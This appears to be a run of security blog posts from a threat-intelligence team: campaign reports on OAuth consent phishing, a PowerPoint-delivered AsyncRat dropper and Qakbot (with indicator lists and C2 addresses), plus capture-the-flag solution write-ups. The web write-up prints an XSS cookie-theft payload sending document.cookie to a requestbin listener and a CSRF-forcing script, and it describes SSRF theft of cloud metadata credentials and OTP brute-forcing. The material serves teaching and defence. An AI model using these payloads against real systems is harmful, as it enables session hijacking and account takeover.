hxxps://login.windows.net/common/oauth2/authorize?response_type=code&client_id=70ab9cd5-96a5-4dee-b9af-xxxxxxxxxxxx&client_secret=ef17da38-f26c-49d9-9c9c-xxxxxxxxxxxx &redirect_uri=https%3A%2F%2Fkp3jccawgk[.]online&resource= https%3A%2F%2Fkp3jccawgk[.]online&state=xxxxxxxxxxxx #efe1b61bcf8df6b76595xxxxxxxxxxxx

The url above represents an access requested to the Microsoft Identity platform with a request for an authorization code, denoted by the response_type flied. The client_id field denotes the unique ID of an Azure application owned by the threat actor, with a redirect_uri field pointing to a domain – kp3jccawgk[.]online – staged by the threat actor to capture the redirected HTTP request once the victim grants the access permission.

To create such an attack infrastructure the threat actor only needs to register a rogue application under an Azure tenant, and to host a website to capture the URL requests and  authorization codes. The redirected site also contains JavaScript snippets that detect the accessing IP address and details of the victim organisation, very likely for victims’ profiling and filtering out potential accesses from security vendors.

Eventually, the victim is redirected to a blank page, now defunct.

Threat actors would then leverage the rogue application and request a valid access token with the authorization code. They could then access the victim’s O365 account with the permissions granted during the phishing process, and perform a variety of actions from accessing account information to sending emails on behalf of the victim.

This attack aims at stealing access tokens in form of OAuth. This allows direct access to a victim’s account and bypasses the need to steal valid user credentials, including multi-factor authentication.

Attack infrastructure and insights into the campaign

By pivoting on the redirect domain, we were able to identify multiple threat actors’ domains suggesting that they are very likely targeting banks, asset managers, equity firms, and in a lesser degree also law firms and consultancies around the world, including Hong Kong. According to domain registration data, the campaign started at the end of February and it is currently active. Based on the nature of its targeting the campaign appears to be financially-motivated.

Detection and remediation

To detect malicious behavior linked to a user falling victim to a similar phishing email, the most effective way is to monitor Azure audit logs for “Consent to Application” events. These represent users’ approval to grant permissions to third-party applications. Microsoft Cloud App Security is also a good location to detect new OAuth applications with high privileges in the tenant.

Sample Microsoft Azure log showing a Consent to Application event for a malicious Azure application

In the event where an internal user falls victim and consent is given to rogue application, IT teams can manually remediate the applied access under the “Enterprise Application” section of Microsoft Azure portal, and ensure that the user credentials are reset and protected by MFA. As a preventive measure, IT teams are also recommended to leverage the Azure AD Admin Consent to force administrator involvement to gatekeep user data against such kind of attack tactic.

Indicators of compromise

  • 188.166.68[.]51
  • kp3jccawgk[.]online
  • 17l78xgnzj[.]online
  • 4zl8t4sqon[.]online
  • 9ybzef6d2h[.]online
  • cprapid[.]com
  • cts1g02r2c[.]online
  • kp3jccawgk[.]online
  • l7p5g1kwh4[.]online
  • num7ewnkn1[.]online
  • rh6757nysb[.]online
  • wbxputufpj[.]online
  • wzoschqdd0[.]online

Hackaday 2020 – Securing the basics [P-3]

Incident Response and Threat Intelligence Challenge

As we mentioned in our previous posts on the Web and Cloud challenges, every year DarkLab organises a capture the flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year! In this post we cover the Incident Response (IR) and Threat Intelligence (TI) questions.

Ransomware Attack Again 1 (50 pts, 14 solves)

Description: Our client has been hit by a ransomware attack. While the rest of the client’s PCs have been restored, the head of IT insists to decrypt the data to recover an important screenshot of server settings and passwords. They refuse to pay the ransom. The sysadmin left only the snapshot of the infected server.

It seems there is not much left to see. We’re reaching out to you, our best malware analyst, to help research and find a way to decrypt the screenshot.

RDP: hackaday2020-teamX-ransomware.eastasia.cloudapp.azure.com ,  X is your team number

After connecting via RDP to the machine, we can see another user named sysadmin by navigating around the file system. On that user desktop, the following are found :

  • Ransomware affected file with extension HKADYYY
  • Ransom note HKADYYY-README, containing a flag

hackaday{y0u_hAve_b33n_R@ns0meD!}

Ransomware Attack Again 2 (100 pts, 7 solves)

Description: Other than the ransom note, what other artefacts could you find?

By navigating the windows event logs, we notice a suspicious code snippet under powershell – large base64 payload (powershell with -e option).

The following two values are found by decoding the base64

  • Caller script : . $prog -InV 'MTIzNDU2Nzg5MDEyMzQ1Ng=='
  • Second flag

hackaday{wHo$_G0T_my_r@r1Sonn?!}

Ransomware Attack Again 3 (50 pts, 2 solves)

Description: sometimes there is public research on the ransomware behavior which may help you to decrypt the files. Try to surf the net!

A search online will not reveal much, until you check on Twitter, where you will find the following tweet.

The tweet contains the following link : https://0bin.net/paste/xBy4OoNz#0lSty7wpQSy2risE3g6X2Idj4HTNyhy6YaUgeWBmC0-

This 0bin.net post includes a small summary of the ransomware, a decryption routine, and the third flag hackaday{Blrdi3 w!th th3 g00d n@vvS}

Ransomware Attack Again 4 (300 pts, 0 solves)

Description: You are in the final step, tell me the content of the decrypted file!

According to the decryption routine, successful decryption requires two values :

  1. IV : Given by base64 string located in the loader : MTIzNDU2Nzg5MDEyMzQ1Ng==
  • Key-seed : random two-digit and the SID (obtained by checking the user that executed the ransomware i.e. sysadmin)

00S-1-5-21-1580626154-3826959220-856111413-500 to 99S-1-5-21-1580626154-3826959220-856111413-500

The following decryption code is implemented with the IV and Key (two digit is 99):

$IV = "MTIzNDU2Nzg5MDEyMzQ1Ng=="
$Key = "ODgxM2QyOTU4ZjljODAzOGVjMDhiMjljYjFjODgzMGM="
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
$aesManaged.Key = [System.Convert]::FromBase64String($Key) 
$decryptor = $aesManaged.CreateDecryptor();
$fileToDecrypt = "C:\path\to\encrypted\file.HKADYYY"
$encryptedFile = [System.IO.File]::ReadAllBytes($fileToDecrypt)
$bytes = $encryptedFile
$unencryptedData = $decryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
[System.IO.File]::WriteAllBytes($fileToDecrypt,$unencryptedData)
Rename-Item -Path $fileToDecrypt -NewName ($fileToDecrypt.Substring(0, ($fileToDecrypt.Length - 8)))
$aesManaged.Dispose() 

Using the routine to decrypt the file:

Decryption routine will reveal the final flag

hackaday{fr33d!fin@l1y~}

That’s is for this blog series, we hope you enjoyed reading and looking forward to seeing you at Hackaday 2021!

Hackaday 2020 – Securing the basics [P-2]

Cloud Challenge

Every year, DarkLab organises a Capture the Flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year!

Make it Rain in the Bucket (50 pts, 14 solves)

Description: Unintended sensitive information disclosure comes in many shapes and forms.  You would be surprised with the information you can find through detailed enumeration and a bit of online research.  Can you unlock the secrets within to take you to the next part of the network? http://www.hackaday.info

P.S. AWS account is not required for this question

This first challenge is meant to emulate an unsecured AWS s3 bucket. The website hackaday.info is a static webpage hosted as an AWS S3 bucket. When hosting a website as an AWS S3 bucket, the bucket name (hackday.info) must match the domain name (hackday.info).  By enumerating the site with a ping request, we get the following data:

The ping returns with the domain name s3-website.ap-east-1.amazon.com. If we access the domain, it will return the objects stored in the bucket.

An interesting file should catch your attention – admin_users_only/useraccess.txt -which contains the first flag.

Keys behind the wall (100 pts, 8 solves)

Description: There might be something insecure with this web application, if you could find the keys behind this application, you are one step closer to the image. The flag format is hackadayxxxxxxx

This challenge was meant to emulate a SSRF vulnerability in the application hosted on an AWS EC2 instance.

The SSRF attack allows to request the metadata of the EC2 instance. In AWS the metadata can be access by browsing to http://169.254.169.254.

As shown below, the AccessKeyId, SecretAccessKey and token are exposed, and an attacker could then impersonate the role attached on the machine using the temporary credentials and conduct additional discovery. The second flag is the role name.

Secret in the Image (200 pts, 1 solves)

Description: The secret lies in the image

This challenge was meant to emulate a misconfigured AMI-image which allows public access. With the credentials for programmatic access to AWS obtained from the second challenge, we can use our own AWS account to impersonate the role by changing the authentication file ~/.aws/credentials.

Once we assume the role, we can start enumerating the policies attached to the role to determine the level of privilege that the role has.

As shown above, the role has two policies attached. The hackadaypolicy is a custom policy created for this role. The next step would be to enumerate the hackadaypolicy to determine what permissions are assigned in the policy.

The screenshot above shows all the permissions that are assigned to the policy. If we enumerate all the permission given, we would stumble upon ec2:DescribeImage which has the parameter set to public = true with the AMI-ID shown.

This shows that the AMI-image created by this role is set to public, which allows everyone with an AWS account to access it.

We can then search for the instance from the community AMI group and launch the instance.

Once we launch the AMI , the 3rd flag can be found under the /tmp folder of the EC2 instance.

That’s it for this challenge, stay tuned for the third and last post which will walk through the Incident Response and Threat Intelligence challenge.

Hackaday 2020 – Securing the basics [P-1]

Web Challenge

Every year, DarkLab organises a Capture the Flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Security the Basics”, based on the experience and real life challenges that organisations in Hong Kong have faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year!

Web Challenge – With great power comes great responsibility!

Hackaday Chat System 1 (100 pts, 4 solves)

This challenge is meant to exploit the broken access controls of a website. After registering and login with an account, you will notice that there are several accounts created (i.e. operator_day1, admin_day1, admin_day2) from the “Select User” drop-down list. The account operator_day1 will be our target for this challenge.

The key element is the user’s UUID form in the user profile page. The user’s UUID for this system is crafted from MD5 hash of the user email. Using an md5 generator, we are able access the profile page of operator_day1 by entering /profile.php?uuid=14a7a7da8dfcba61a4af2b695a553cf0.

Inside operator_day1 profile page, we can retrieve the password SHA256 hash of the user. Using an online hash cracking site, we are able to recover the plaintext password of the operator’s account.

After logging in with the operator account, the flag will be displayed at the chat box.

Hackaday Chat System 2 (150 pts, 1 solve)

This challenge is an extension of the Chat System 1. This time, the account admin_day1 will be our target.

In the operator_day1’s profile, a new endpoint – updateUser.php – is available to update username or password. However, after clicking the button, an error message is prompted saying the naming function is in maintenance.

Using a web proxy tool, we can change the “from” data of the request to delete the name changing parameter. As the endpoint is also vulnerable to parameter injection, adding a new data field “role” would grant us the role of the user.

Here we crafted a request to change the role of operator_day1 to administrator, which is same as the role of admin_day1.

With administrator privileges, we can now change the password of admin_day1 to another one of our choice. (Note that UUID in the request is the one from the admin_day1 account)

After logging in to the system with admin_day1 account, we can retrieve the flag in the chat box.

OTP Member Portal (150 pts, 0 solves)

Description: Multi-factor authentication (MFA) is an electronic authentication method in which user is granted access to a website or application only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism: knowledge (something only the user knows), possession (something only the user has), and inherence (something only the user is) – SUPER SAFE!

This challenge aims to bypass the password login process and brute force weak a MFA system.

Once you register an account in the system and complete a normal login process, you can notice that:

  1. You would need an account from Hackaday Chat System in order to receive OTP
  2. The OTP is 3-digit code from 100-999
  3. Account will be locked after 5 incorrect OTP login attempts
  4. You can send request to reset the fail counts and the OTP
  5. The target account of this challenge is admin_day2@hackaday.com
  6. Exploiting the target account in Hackaday Chat System would not work since admins will not receive OTP from chat system
  7. The normal login process is represented in the below graph

The point of exploitation is from the password login. Due to broken access control, after the “password incorrect” message is prompted, we can still access the OTP login page directly with the target account information embedded in the PHP session.

You could therefore write a script to exploit the system by bruteforcing the OTP system:

  1. Login on the account admin_day2@hackaday.com with random password
  2. After seeing the “password incorrect” message, directly access /OTPlogin.php
  3. Brute force the OTP at maximum 4 times
  4. Submit request to resend OTP if all attempts failed
  5. Repeat step 3 and 4 until the OTP login is successful
  6. Access member.php with the same PHP session

A sample program written in Go (otp-sample.go) is provided for reference.

After finishing the above steps, the flag will be displayed at profile.php.

OTP Admin Portal (100 pts, 0 solves)

This challenge aims to exploit the file uploading feature in the system. We are allowed to upload any files to the system with the only limitation being on file size. After uploading a .htaccess file with directory listing enabled (‘Options +Indexes’), we can find the flag with the link provided.

Simple Message Board (250 pts, 3 solves)

Description: I found a message board online and seems that there is a secret hiding which can be only access by the admin. Do you know how to get the secret?

This challenge is aimed at exploiting the message board system with Cross-site scripting (XSS) and/ or Cross-Site Request Forgery (CSRF).

In the message board system, we are given three functions: one for posting a message to the board, one for clearing the log, and one for getting the flag.

It is observed that:

  1. Someone (likely the admin) is frequently accessing the board and clearing logs
  2. Both name and message fields are vulnerable to XSS
  3. There is a hidden field (csrf_token) in the “Get Flag” form
  4. There are PHP session ID and a field named “Admin” in the cookie, changing the value of “Admin” field to “Admin” will not work also

The target of this challenge is to force admin to somehow click the “Get Flag” function or steal the session (cookies) from the admin.

Solution 1

To solve the challenge, we could write a script to force admin to access the “Get Flag” function:

<script>

setTimeout(function(){

      var xhr = new XMLHttpRequest();

      xhr.open("POST", "getflag.php");

      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

      xhr.send("csrf_token=" + document.querySelector("input[name=csrf_token]").value);

}, 1)

</script>

The script will do the following procedures:

  1. Query the value of csrf_token in the page
  2. Send a form request to getflag.php to trigger the function

As there may be situations that the script run without csrf_token properly loaded, some time delay (such as using settimeout, onerror etc.) is required such that the script would be executed successfully on the admin side.

After sending the script to the board and wait for a second, the flag will be shown on the board.

Solution 2

To tackle the challenge, we could setup a listener (e.g. pastebin) for receiving http request and send the following script to the message board:

<script>fetch("http://requestbin.net/r/<ID>/?a="+document.cookie)</script>

By using this script, if admin accessed the message board, a HTTP GET request will be sent to our requestbin service with all cookies logged.

After a short waiting, we will receive the above request with the information we need.

With the cookies of the admin account, we can now get the flag by clicking the “Get Flag” button.

Stay tuned for the second part of this blog series: Cloud challenge.

Presentation is Key

Criminals exploit PowerPoint documents and blog infrastructure to deliver RAT and steal cryptocurrency

DarkLab has recently responded to cybercriminal phishing attempts in APAC exploiting unusual tactics, techniques and procedures (TTPs). While most phishing we observe contain MS Word or Excel attachments, this one exploited malicious PowerPoint (.ppt) files to eventually deploy AsyncRat malware and a bitcoin stealer.

Exploitation of PowerPoint attachments is not entirely new. However, it is rare enough to remain uncommon and therefore increase the chances that unaware users would open malicious attachments.

This phishing campaign, likely still active, appears to be focused on Asia, particularly China, although we also found samples uploaded on a popular multi-vendor AV scanner from countries in Europe.  Most of the titles of the malicious documents are generic. However, the use of titles such as “Hotel Doc” for some of their lures suggests that the hospitality industry is one of the sectors targeted.

Phishing lure analysis

The first phishing email we picked up caught our attention for its use of Traditional Chinese characters used in Hong Kong and Taiwan, as opposed to the Simplified Chinese used in Mainland China. The email included a malicious PowerPoint attachment named 付款詳情.ppt [MD5:
8311c59ef727826c4b54e182a956e312], which contains malicious and obfuscated macros. The macro only  executes when the file is closed by the user, in a likely attempt to avoid raising the victim’s suspicion.

Fig 1 – Deobfuscated payload [MD5: 127538a7d8703ec96a5e39e9fd235c06]

After deobfuscation it is clear that the VBA macro leverages the legitimate binary mshta.exe to connect to a hardcoded URL masked with the j.mp URL shortening service. The hardcoded URL eventually redirects to tumharimaakachodamarunmaine[.]blogspot[.]com/p/3-sunda-10-origin[.]html

Attack infrastructure and timeline

J.mp is a separate address for the better known bit.ly shortening service. According to bitly’s statistics, the malicious URL discovered was created at the end of February.

Fig 2 – bitly creation data for the malicious URL

The URL points to a server used by the threat actor to stage a range of malicious payloads, from cryptocurrency stealers to an open source remote access trojan (RAT). We will get to that in a second.

Pivoting on the identified staging server revealed a significant number of additional attack infrastructure, a new URL for each phishing document. These servers were all hidden behind the same j.mp shortening server and hosted on Blogspot infrastructure.

By checking the URLs creation date on bitly we were able to get a timeline of the malicious campaign, which shows how the threat actor behind it has been active since the beginning of the year and has recently increased their activity.

Fig 3 – timeline of attack infrastructure set up

Payloads

In terms of payload, we could only examine one malicious URL [Tumharimaakachodamarunmain[.]blogspot[.]com/p/42[.]html] and found a number of scripts. We suspect that other URLs may host different payloads.

Fig 3 – Screenshot of the malicious webpage

The webpage looks benign at first glance. However, accessing it with MSHTA triggers on the victim’s endpoint a number of JavaScript payloads embedded on the website.

The first script executes a set of VBScripts that fetch the content of the following link:

hxxps://ia801408.us.archive[.]org/25/items/defender_202103/defender[.]txt

The file is deobfuscated and dropped on %Public%\bin.vbs before execution, and it aims at disabling security controls for subsequent malware executions.

Fig 4 – First script disables system’s security settings

The second script reaches out to the following URL, again with MSHTA : mylundisfarbigthenyouthink.blogspot.com/p/42.html

It contains three additional payloads to disable security defences and hiding attackers’ windows to hide malicious activity.

Then, an additional PowerShell script is executed by loading the script from two additional sites depending on the system architecture.

hxxps://ia601401.us.archive[.]org/24/items/2_20210304_20210304_2014/1[.]txt

hxxps://ia601401.us.archive[.]org/24/items/2_20210304_20210304_2014/2[.]txt

The payload will reflectively load two additional samples: a heavily obfuscated DLL with anti-analysis mechanisms [MD5: d1a426b9afe2ca1e56cdf48523c684e3], and an open source RAT called AsyncRat [MD5: 47c012de1faac9be5a860b600a06c5ee].

AsyncRat is able to send and receive commands, record keystrokes and screenshots, and upload/download files via SFTP, among other functions.

The threat actors also tries to steal victims’ cryptocurrencies by replacing the legitimate wallet address with one controlled by the attackers. This is done via the Powershell script shown below that looks for BTC wallets addresses in the clipboard and and replaces them with another one. Our research into the attacker’s BTC address shows that it had two small transactions, suggesting the attacker had so far only limited success.

Fig 4 – PowerShell script for cryptocurrency theft

Finally, the last script downloaded from the stager domain attempts to terminate instances of excel.exe and winword.exe in attempt to hide attacker’s tracks.

Conclusion

The attacker’s exploitation of open source malware and abuse freely available Blogspot URLs as malicious infrastructure highlights the increasing lowering barrier of entry for cybercriminal operations in Asia. Despite the relatively low-level nature of this threat in terms of technical sophistication, the use of malicious PowerPoint attachments shows some innovation in their social engineering tactics. Overall, this campaign shows how even low-cost but complex cybercriminal campaigns can pose a threat to organisations by leveraging unusual social engineering techniques and open source tools.

Indicators of Compromise

  • tumharimaakachodamarunmaine.blogspot.com
  • tumharimaakachodamarunmain.blogspot.com
  • ifyouarebadtheniamyourdadhehe.blogspot.com
  • myralundpakarloab.blogspot.com
  • mylunissharp.blogspot.com
  • mylundisfarbigthenyouthink.blogspot.com
  • 8311c59ef727826c4b54e182a956e312
  • d1a426b9afe2ca1e56cdf48523c684e3
  • 47c012de1faac9be5a860b600a06c5ee
  • f7fd745b52fb8e791254492eca2c41df9281430dcbc5b56baa715b32eeb417ed
  • ae133004d194c3701d0b2051904d07ad69c901830a710cc2de6cb465c67bdc9d
  • 015224452b3232f76924d4020b45cfc954b80a4f14563d9fe7dadffb1699f090
  • 4be0a1ade0230dc10ef523d30d3f28ab1e70a4b5587086edfcdbfa9b30fb9c9a
  • a07e7d0a6699cbcb960bbe8c3a34b85a878abda0d19cd98d2e0ce170369c7ccf
  • d925e0405f8b9a4c0c06751a36318bcccd54721c107c08dc851fec12b58ec9ab
  • 78599a0757c19b98f6d5ec650a5f80181f90117215edcf5f79c7099c12f9710a
  • 4199e3e42abb7d71ca8183609e80225014ce4b232990d526ec0655b889aac5fd
  • 46730c85c3da44a3bfc2d4786db1bf1b0f13a0c523c3b7ae88749b3538d1b8c1
  • 4f0d613797aa59fbcb957162c37d586e020cfb65a886972b404bbda4473d0b5e
  • 65bbecd4400d257e8eb367b56ec846de4e4efaf3274622fd01c8751adde5d30b
  • 266ffecbcb98bd2401298ca8fbe8bdc9df9fd8ebdfee8acf267a43cedd870050
  • f9498a2b0d6c38da6ad465a0135c5d20817bffeaf5ed09b9de8a7a22ec1ada58
  • 4a90be311633d5052b7ef4c6edd0ccddd472daab1ce183af0763b69d47ce4406
  • dc36dea840aec26090afba82b6a93f706b73c850286e6d80d95bf0604cc72d43
  • 9da6a119d0986bb18a84cef88915c5934074d189b57c0ee62103b24549f1fd51
  • 78599a0757c19b98f6d5ec650a5f80181f90117215edcf5f79c7099c12f9710a

Robber Duck

Qakbot goes phishing in Hong Kong

Since the beginning of 2021, DarkLab analysts have observed multiple clients and third-party organisations in Hong Kong targeted with malicious phishing emails aimed at delivering the Qakbot malware, also referred to as Quakbot or Qbot. While the Qakbot payload is well researched in open source, we want to shed light on the observed attack chain to raise awareness of this threat and help mitigate future phishing attempts against organisations in Hong Kong and APAC.

Since the takedown of Emotet, one of the largest spam botnets and initial access broker, cybercriminals behind Qakbot have increased their operational tempo and are actively targeting  Hong Kong. We therefore expect Qakbot to remain a threat for the region in the coming months, particularly due to Qakbot links to known ransomware families.

Infection chain

Qakbot started as a banking trojan in 2009 but has since 2019 been seen exfiltrating sensitive financial data and email threads from victims, as well as delivering the ProLock ransomware.

The phishing emails we observed were sent from likely compromised third party companies. These previous victims were based around the globe, from South America to Asia, highlighting the global scope of Qakbot’s operations.

The email’s subject and text suggest the threat actors have hijacked email threads to add a layer of credibility to their phishing lures. In one case, a phishing email to a large company in the real estate sector referred to an existing high-profile event that the target organises each year, likely suggesting the phishing attempt was somewhat targeted rather than completely opportunistic.

Fig 1 – phishing email to a property developer delivering QakBot malware

Other phishing emails, like one sent to a retail organisation (see below), threat actors attempted to spoof the sender to make it look like it was coming from an organisation based in Hong Kong.

Fig 2 – phishing email to a retailer delivering QakBot malware

The emails have a compressed archive attached, containing a macro-enabled Excel document.

Fig 3 – overview of Qakbot infection chain

The latter displays a generic DocuSign template and requires user interaction to activate the malicious macros hidden in the workbook.

Fig 3 – phishing lure used to deliver QakBot malware

We analysed one such lure document [filename: Document_1204144908-12232020-Copy.xlsm ; MD5: 77a6bf34403b2a4e6e2eaa4435d22b50] which executes macros that serve as a dropper. The dropper contacts one of five command and control (C2) URLs in an attempt to download the same file called, in this case, 55555555555.jpg, a DLL file containing the second stage of the malware. Other droppers analysed also showed similar behavior despite the different stager servers and DLL names dropped.

We also found numerous documents similar to the one we analysed, reinforcing how this was indeed part of a larger phishing campaign.

Fig 4 – Example of similar phishing documents on Virus Total

The macro eventually starts the malicious DLL [MD5: 66adf2e8e5561bf7cf3f3cb50d9256bf] run via rundll32.exe, a technique used by threat actors to proxy execute malicious code while avoiding detection by security systems.

Fig 5 – Qakbot execution of malicious DLL via legitimate process

This specific campaign is linked to one of Qakbot’s botnets called abc117, while security researchers have linked other botnets, like abc123, to spam campaigns in other parts of the world. Malware operators often use different botnets to ensure resilience from law enforcement action and their ability to deliver malware to a wider range of targets.

Conclusion

Despite the successful law enforcement action against one of the largest spam botnets, Emotet, in January, our findings suggest that other botnets are ready to step into the vacant spot left by it.

Operations like Qakbot show how phishing will remain a significant threat for companies in Hong Kong, as threat actors use similar malware to obtain an initial foothold in companies’ networks and to deploy further malware, like human-operated ransomware.

Strong email security processes and users’ awareness remain paramount to avoid initial infection from similar phishing campaigns that can lead to very impactful ransomware incidents. Threat feeds can also help detect often-changing attack infrastructure of botnets like Qakbot by providing up-to-date indicators of compromise for ingestion of security detection systems. In particular, we found that URLhaus’ database contains a useful source of malware URLs for Qakbot that can aid network defenders.

C2 servers hardcoded in Qakbot DLL analysed

Note that not all the below IPs are likely to be still actively used for malicious purposes, please apply caution when using them for blocking.

67.6.54.180:443197.49.109.229:995149.28.101.90:8443
187.250.170.34:99575.67.192.125:44345.77.115.208:8443
67.141.11.98:443187.202.130.179:443216.215.77.18:2078
109.154.79.222:222267.82.244.199:222245.32.211.207:8443
2.88.184.160:44341.228.211.35:443207.246.77.75:2222
85.52.72.32:2222197.82.221.199:443207.246.77.75:995
86.98.21.234:44390.53.100.20:222298.16.204.189:995
73.166.10.38:5000337.210.132.106:99580.106.85.24:2222
90.61.30.155:2222191.84.1.58:44386.126.220.203:443
71.182.142.63:44373.166.10.38:6120271.14.110.199:443
178.223.22.192:99586.98.223.81:2283.110.241.182:443
184.189.122.72:44380.11.5.65:222276.111.128.194:443
181.39.236.199:443187.7.236.197:99532.212.117.188:443
72.240.200.181:222281.214.126.173:222272.36.59.46:2222
154.238.45.174:99590.201.21.58:44368.186.192.69:443
47.22.148.6:44389.137.211.239:995105.226.38.36:443
2.51.251.47:99524.234.204.230:995109.106.69.138:2222
199.19.117.131:443189.222.83.156:443108.46.145.30:443
200.76.215.87:443181.134.233.216:443181.129.155.10:443
37.104.39.32:99595.77.144.238:44337.210.255.225:995
14.137.64.132:995100.43.250.74:99574.195.52.3:443
70.126.76.75:44369.47.239.10:44373.166.10.38:443
5.194.151.240:2222151.52.8.91:443190.24.187.90:443
83.202.68.220:2222197.237.62.207:44395.77.223.148:443
189.251.67.57:99589.136.112.74:44347.196.49.123:443
197.161.154.132:443190.85.91.154:44324.229.150.54:995
120.150.218.241:9952.50.167.241:443189.172.242.124:443
75.136.40.155:443193.248.154.174:2222140.82.49.12:443
151.205.102.42:443207.246.77.75:8443212.197.145.59:995
41.39.134.183:44324.139.72.117:44347.208.8.187:443
187.213.80.185:995149.28.99.97:22222.88.48.122:995
82.12.157.95:99545.63.107.192:222268.15.109.125:443
77.136.21.144:995144.202.38.185:4432.90.219.195:443
47.40.78.73:443207.246.77.75:443151.60.45.241:443
173.18.126.193:2222149.28.98.196:443217.165.3.30:443
51.9.198.164:2222149.28.98.196:995190.72.211.89:2222
94.26.114.54:443149.28.101.90:222284.247.55.190:8443
197.45.110.165:995149.28.101.90:99574.222.204.82:995
184.90.50.79:995144.202.38.185:99598.240.24.57:443
77.30.61.241:99585.204.189.105:44392.59.35.196:2083
47.134.138.15:44396.19.117.140:443174.20.167.39:995
196.151.252.84:443106.250.150.98:44345.63.107.192:443
23.236.12.55:44398.190.24.81:44396.61.23.88:995
81.88.254.62:44337.116.152.122:2078108.190.151.108:2222
105.198.236.99:443172.87.157.235:338945.77.115.208:995
78.97.248.88:443216.201.162.158:443144.202.38.185:2222
188.25.61.41:44395.76.27.6:44324.185.65.68:443
45.77.115.208:443174.87.65.179:443149.28.98.196:2222
45.77.115.208:222250.244.112.106:44324.122.0.90:443
45.32.211.207:995189.157.252.151:443175.141.131.195:443

Criminal Shopping Habits

Cyber threats to the retail sector

The retail industry is increasingly gearing towards e-commerce platforms and cashless, even contactless, payments – a trend accelerated by the Covid-19 pandemic.

Even before that in 2020 41% of shoppers said they would purchase items online for things they would normally go to the store for. In 2019, 53% of Hong Kong residents tried to be completely cashless, according to Visa. The retail and consumer landscape is clearly changing rapidly, and cyber threats facing the industry are following accordingly.

As payments increasingly move online, so do cybercriminals’ attempt to steal payment card data. Traditional point of sale (POS) malware attempts to steal customers data by infecting retailers’ POS devices. While still present, POS malware is losing effectiveness due to increasingly secure cards standards like EMV, and because of the growing use of contactless payments, including mobile payment systems like Apple Pay and Google Pay.

Consumers’ growing appetite for ecommerce has therefore led criminals to adopt new tactics. One of the most widespread includes stealing payment data on ecommerce websites by injecting malicious JavaScript skimmers in checkout pages, a technique known as Magecart.

The growing threat of web skimmers

Magecart is a common and hard to detect threat for online retailers. Researchers estimate that every 15 seconds one e-commerce website is infected with MageCart malicious code. Some large scale Magecart operations have compromised thousands of websites at a time, including about 2000 e-commerce sites in just three days in September. Criminals injected malicious JavaScript code likely via outdated v1 and v2 versions of the Magento e-commerce platform.

Compromise of popular third-party e-commerce platforms like Magento allows criminals to automatically deploy JavaScript skimmers on hundreds of vulnerable victims at the same time. Indeed, the name Magecart itself refers to this common intrusion vector (Magecart = Magento + shopping Cart).

Magecart supply chain compromise are widespread. However, websites can also be targeted in direct operations by exploiting existing vulnerabilities. Malicious changes to check out pages are often minimal and hard to detect. Criminals can just append a few lines of code to a legitimate JavaScript library to avoid detection. A US precious metal retailer this year discovered that Magecart card-stealing code was present on their website for some five months, likely affecting tens of thousands of customers. The incident highlights the stealth and long term impact that a Magecart compromise can have on retailers.

Example of Magecart compromise

Human-operated Ransomware

Although customers’ data are a precious criminal commodity, cybercriminals also target retailers’ networks for extortion. Human-operated ransomware, in particular, is among the most impactful and widespread threat that DarkLab analysts have observed targeting Hong Kong organisation in 2020.

This year we helped two prominent Hong Kong retailers responding to network compromises by the Maze and Netwalker ransomware families. As it is increasingly common among ransomware operators, the retailers were threatened with data leaks on top of the data-encryption coercion. For retailers that process a significant amount of customers’ data, a data leak can present significant reputational and regulatory concerns, not to mention the operational impact that a widespread systems’ encryption can cause.

As we previously reported, ransomware operators often exploit known vulnerabilities in victims’ external IT estates (including for SSLVPN appliances), and exposed remote access services like RDP. However, large scale phishing campaigns like those of Emotet can also result in ransomware deployment. A specialist news outlet recently highlighted how most malware infections – even from unknown or low level variants – should be treated as potential ransomware incidents due to the growing popularity of initial access brokers malware services.

Business email compromise remains a concern

DarkLab also observed companies in the retail sectors becoming victim of another widespread threat, business email compromise. The international supply chain Hong Kong retailers rely on makes them a target for fraudsters looking to impersonate distant third parties to misappropriate funds. As working from home arrangements are becoming more prevalent, fraudsters are also looking to hijack communications between two employees in the same territory. The lack of physical interactions between employees makes email fraud easier.

To do that, fraudsters adopt ingenious social engineering techniques. These include passively monitoring email exchanges from a compromised email account while only modifying a few selected terms – like bank account details. This can lead to employees not realising their communications have been compromised until it is too late.

Strict rules for unusual bank transfers, as well as good email security hygiene can help prevent, or at least detect, these kinds of incidents.

Opportunistic attacks are more than a nuance

Some attacks can be less sophisticated than others but still require lengthy and cumbersome responses. For instance, DarkLab is aware of a retailer operating in Hong Kong that was recently infected in a likely automated fashion by a self-spreading crypto miner. The malware exploited an exposed RDP server, but was quickly detected by the victim’s security system. Nonetheless, time and resources had to be spent to conduct a thorough systems audit to ascertain the extent of the intrusion.

